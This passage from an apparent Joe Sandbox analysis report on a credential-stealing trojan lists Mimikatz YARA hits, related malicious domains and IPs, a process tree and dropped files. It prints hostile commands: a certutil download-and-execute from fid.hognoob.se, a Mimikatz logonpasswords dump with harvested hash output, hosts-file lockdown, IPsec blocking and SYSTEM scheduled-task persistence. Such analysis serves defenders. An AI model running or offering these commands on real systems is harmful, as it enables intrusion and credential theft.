27.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
4.1.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
4.1.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
4.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
4.1.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
11.1.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
11.1.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
11.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
11.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
11.2.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
11.2.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
11.2.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable
Florian Roth
Unpacked PEs
Copyright Joe Security LLC 2019 Page 15 of 69
11.2.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
11.2.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
4.2.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
4.2.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
4.2.sqlisrv.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable
Florian Roth
4.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
4.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
27.2.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
27.2.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
27.2.sqlisrv.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable
Florian Roth
27.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
27.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
12.1.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
12.1.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
12.1.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable
Florian Roth
12.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors
Mimikatz credential dump tool: Error messages
@fusionrace
12.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa
Mimikatz credential dump tool @fusionrace
Source Rule Description Author
Match Associated Sample Name / URL SHA 256 Detection Link Context
195.128.126.120 fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
Match Associated Sample Name / URL SHA 256 Detection Link Context
upa2.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.254
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.159
download.exe Get hash malicious Browse 139.162.71.92
q1a.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
Joe Sandbox View / Context
IPs
Domains
Copyright Joe Security LLC 2019 Page 16 of 69
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.254
download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
download.exe Get hash malicious Browse 195.128.127.254
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
2019.ip138.com fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
unloadcur.exe Get hash malicious Browse 125.77.198.152
unloadcur.exe Get hash malicious Browse 125.77.198.152
fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
download.exe Get hash malicious Browse 117.25.157.119
upa1.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.254
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.159
download.exe Get hash malicious Browse 195.128.126.243
Match Associated Sample Name / URL SHA 256 Detection Link Context
Match Associated Sample Name / URL SHA 256 Detection Link Context
unknown request.doc Get hash malicious Browse 192.168.0.44
FERK444259.doc Get hash malicious Browse 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js
Get hash malicious Browse 192.168.0.40
Setup.exe Get hash malicious Browse 192.168.0.40
base64.pdf Get hash malicious Browse 192.168.0.40
file.pdf Get hash malicious Browse 192.168.0.40
Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40
request_08.30.doc Get hash malicious Browse 192.168.0.44
P_2038402.xlsx Get hash malicious Browse 192.168.0.44
48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22
seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40
Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40
QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40
pptxb.pdf Get hash malicious Browse 192.168.0.40
unknown request.doc Get hash malicious Browse 192.168.0.44
FERK444259.doc Get hash malicious Browse 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js
Get hash malicious Browse 192.168.0.40
Setup.exe Get hash malicious Browse 192.168.0.40
base64.pdf Get hash malicious Browse 192.168.0.40
file.pdf Get hash malicious Browse 192.168.0.40
Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40
request_08.30.doc Get hash malicious Browse 192.168.0.44
P_2038402.xlsx Get hash malicious Browse 192.168.0.44
48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22
seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40
Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40
QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40
pptxb.pdf Get hash malicious Browse 192.168.0.40
ASN
Copyright Joe Security LLC 2019 Page 17 of 69
No context
Match Associated Sample Name / URL SHA 256 Detection Link Context
C:\Windows\SysWOW64\ycemck.exe fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
C:\WebKitSdk\2.25.14\qwr4rt.exe fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
ThumbnailsThis section contains all screenshots as thumbnails, including those not shown in the slideshow.
JA3 Fingerprints
Dropped Files
Screenshots
Copyright Joe Security LLC 2019 Page 18 of 69
System is w10x64
download.exe (PID: 3076 cmdline: 'C:\Users\user\Desktop\download.exe' MD5: 31E46700743FAA4304532B36311E1177)
qwr4rt.exe (PID: 3308 cmdline: C:\WebKitSdk\2.25.14\qwr4rt.exe MD5: EABDC54C61088B769E9AF917AA6B05A4)
sqlisrv.exe (PID: 4748 cmdline: C:\WebKitSdk\2.25.14\sqlisrv.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
cmd.exe (PID: 1896 cmdline: cmd /c ping 127.0.0.1 -n 8 & Start C:\Windows\cc3d3243\b158ac7.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 2560 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
PING.EXE (PID: 2864 cmdline: ping 127.0.0.1 -n 8 MD5: 70C24A306F768936563ABDADB9CA9108)
b158ac7.exe (PID: 5060 cmdline: C:\Windows\cc3d3243\b158ac7.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
cmd.exe (PID: 4080 cmdline: cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe %SystemRoot%\Temp\sqlisrv.exe & %SystemRoot%\Temp\sqlisrv.exe
MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
certutil.exe (PID: 3304 cmdline: certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe C:\Windows\Temp\sqlisrv.exe MD5:
D056DF596F6E02A36841E69872AEF7BD)sqlisrv.exe (PID: 652 cmdline: C:\Windows\Temp\sqlisrv.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
ycemck.exe (PID: 3268 cmdline: C:\Windows\SysWOW64\ycemck.exe MD5: EABDC54C61088B769E9AF917AA6B05A4)
b158ac7.exe (PID: 3356 cmdline: C:\Windows\cc3d3243\b158ac7.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
cmd.exe (PID: 3968 cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrat
ors & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM MD5: F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 1576 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cacls.exe (PID: 4728 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
cmd.exe (PID: 2944 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cacls.exe (PID: 3632 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
cmd.exe (PID: 4316 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cacls.exe (PID: 1252 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
vfshost.exe (PID: 4240 cmdline: C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit MD5:
FD5EFCCDE59E94EEC8BB2735AA577B2B)netsh.exe (PID: 4864 cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 1784 cmdline: netsh ipsec static add filteraction name=BastardsList action=block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 752 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 4068 cmdline: cmd /c C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32 MD5:
F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
GogoleUpadte.exe (PID: 284 cmdline: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32 MD5:
821EA58E3E9B6539FF0AFFD40E59F962)cmd.exe (PID: 1252 cmdline: cmd /c C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\5c2a55da8\Corporate
\log.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)cmd.exe (PID: 1524 cmdline: cmd /c cd C:\Windows\5c2a55da8\usbprohub\ & C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe MD5:
F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
ouousbpro.exe (PID: 2940 cmdline: C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe MD5: C02C8BE9AFC220F8B7852C619AF784C6)
cmd.exe (PID: 1644 cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn '93293e638' /ru system /tr 'cmd /c C:\Windows\ime\b158ac7.exe' MD5:
F3BDBE3BB6F734E357235F4D5898582D)conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 4448 cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn 'd95544aa8' /ru system /tr 'cmd /c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p every
one:F' MD5: F3BDBE3BB6F734E357235F4D5898582D)cleanup
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5
Process: C:\Windows\SysWOW64\certutil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
Created / dropped Files
Copyright Joe Security LLC 2019 Page 20 of 69
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C4E91F59715AA0FB54843EB617B4C0B5Process: C:\Windows\SysWOW64\certutil.exe
File Type: data
Size (bytes): 220
Entropy (8bit): 2.9443655208446446
Encrypted: false
MD5: 1E600A0593C90A99148F16ECD4418654
SHA1: D489E9D2F74199D5C9EEFA91FEF427CF9682C2B2
SHA-256: 629899EA69863F8D6B31B2F55A83CD752DD127F0E7DCE716A7BC037501DD44C8
SHA-512: 37D907C38F0651CF4E3E09F46E73AE65C02FBCF88DDD9EC75039446AFDCECBEEC81840FE18D22D90CE0DF71DAC0ECB002B4AAFC00A176B7EC03A0D8C4B724C75
Malicious: false
Preview: p...... ....D...^...E...(....................................................... .................$............JG.h.t.t.p.:././.f.i.d...h.o.g.n.o.o.b...s.e./.s.q.l.i.s.r.v...e.x.e...".5.c.d.b.1.c.b.3.-.4.7.4.a.0.0."...
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe
Process: C:\Windows\SysWOW64\certutil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\WebKitSdk\2.25.14\qwr4rt.exe
Process: C:\Users\user\Desktop\download.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes): 73728
Entropy (8bit): 5.192189717439081
Encrypted: false
MD5: EABDC54C61088B769E9AF917AA6B05A4
SHA1: 14EE316DB299DF521B9EB37603D83F6750C1F1E6
SHA-256: 51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F
SHA-512: 1BE88D2EDF5AD16B7F3DDFA08323A4A30C576C8A1528B179149713801D1A567A592DC8E36664D23DD95222ED614BD8BACC1AEC5E29A2240766F411FFF74BD997
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: virustotal, Detection: 79%, Browse
Joe Sandbox View:
Filename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, BrowseFilename: download.exe, Detection: malicious, BrowseFilename: , Detection: malicious, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche...................PE..L....dY.................0...........5.......@....@.......................... ..............................................HU..x........'...........................................................................@[email protected]....).......0.................. ..`.rdata.......@... ...@..............@[email protected].......`.......`[email protected]....'.......0..................@..@................................................................................................................................................................................................................................................................................................................................................
C:\WebKitSdk\2.25.14\sqlisrv.exe
Process: C:\Users\user\Desktop\download.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
Copyright Joe Security LLC 2019 Page 21 of 69
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Antivirus: Avira, Detection: 100%Antivirus: Joe Sandbox ML, Detection: 100%Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\WebKitSdk\2.25.14\sqlisrv.exe
C:\Windows\5c2a55da8\Corporate\log.txtProcess: C:\Windows\5c2a55da8\Corporate\vfshost.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 5272
Entropy (8bit): 5.000983475329759
Encrypted: false
MD5: 87C4B9B38AD26CE7D75AE5CBB5AB70CD
SHA1: 14AA5100593F4FF4B1442B8DBE1B82AF366FA572
SHA-256: 8D30C28FD9CAD4C41F3B08EBCF1CFCDB43696EEA36402EF61DBFC47EBF049752
SHA-512: BB4AD8C37ADBAAE57C8316463E2FDAA2C038F7B2371A1CE9F2183462FFAE111C47178C2583F269DB8FF0935DF182E23F866655F0E6614FAA56A8CAE21F46B9FD
Malicious: false
Yara Hits: Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Windows\5c2a55da8\Corporate\log.txt, Author: Florian Roth
Preview: .. .#####. mimikatz 2.1.1 (x64) built on Aug 20 2018 01:54:02.. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **.. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ).. ## \ / ## > http://blog.gentilkiwi.com/mimikatz.. '## v ##' Vincent LE TOUX ( [email protected] ).. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/....mimikatz(commandline) # privilege::debug..Privilege '20' OK....mimikatz(commandline) # sekurlsa::logonpasswords....Authentication Id : 0 ; 109316 (00000000:0001ab04)..Session : Interactive from 1..User Name : user..Domain : user-PC..Logon Server : user-PC..Logon Time : 11/22/2018 12:34:47 PM..SID : S-1-5-21-58933367-3072710494-194312298-1002...msv :.... [00000003] Primary... * Username : user... * Domain : user-PC... * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0... * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709.
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_D.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 8CA1464A51A29D015663DC3E791C3A83
SHA1: 9E4C24A28F425E36105C1F4ED1ECCACC8E8CC751
SHA-256: CE82A1ACA23C7819E58743C6FED2ACB13BB3BE2568F3AD610F9F5C0ECC152B6E
SHA-512: FFA458ED752BCCA8081D978861695DCBBD3D359B91B731E3E02B3A390BCA5D390579CADFA57A50FCE2BA6E4B3AFEB6667A618489B1D55BE9BE56A514822A5228
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........D.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_E.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: B315CFEF01CEED20917E37FC8F27B4F8
SHA1: F559AC1E0B32D1620348BBA10EDC4590C511B1E6
SHA-256: F4340A46A82EFF16B9162D126235D514BBBA60B0E97100DCB372D6FA9DA04C48
SHA-512: 7BC148A312415E6911B0EC78B690935B2CA6D35B10E852B7708C0A9324267F2E376B2A770ACAAEE97934E04B903C1FFC0D7730D1E60B4AB6662DB0BA7D3EE8EE
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........E.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_F.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Copyright Joe Security LLC 2019 Page 22 of 69
Entropy (8bit): 2.8032648063611956
Encrypted: false
MD5: 16EA7A2144E345FF3672977A4FB34987
SHA1: DF653DD612BFD0727FE3192601BA4DD3C6A9C60D
SHA-256: 52D00D6377B0E519A2EFFA3BBBD0E954E5AA04C7E6DE982C412D2A13F375B26C
SHA-512: 84BB329E1DA9C52A23C01A12CF205CC1AE3498B8F658EF4738A878473373AB82522CB35AC57A0AC616DA6F837192C0FEF6B404A711B922373CD001B7D9255525
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........F.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_F.lnk
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_G.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 5EFD382C6D4DC1A40350C35F305F26CA
SHA1: 3BD8240E9F1714360AF78D9781D690D78D075A58
SHA-256: 127D4531E464015A1E7F6E634902D165F4BE1AC13D1E72ED76003AEA1C647D03
SHA-512: E402B7283DD9256EB00F00AF4D1813518598560A9932C08F8A19282817C2AD6B454F13592C09C2BF5E15AAA9526FEF460FB9AEA64C5184E2C137D3403DFFB217
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........G.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_H.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 9E61781A23A323B787416E39B72B7A85
SHA1: E79349938938FB31B09DA0AB7C2858DB841D1CC8
SHA-256: 8CF1C6A97DDE0555E0F6B49103381713631A4493904A8375AD5D6D0937FBD3C2
SHA-512: 6768FDAB99D489043282C7ED72B6FC8F5CCD745E2066738FA6B3F47F2EDC687A3583800499B0EFAFB1AEBEDB6BE38AC78C6F00D81146F061471AFAA8CE8345F6
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........H.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_I.lnkProcess: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: B350D7FCC319AAD19C5B1F0D05755D80
SHA1: 3D72504461902E443DB9799684E639F22349E965
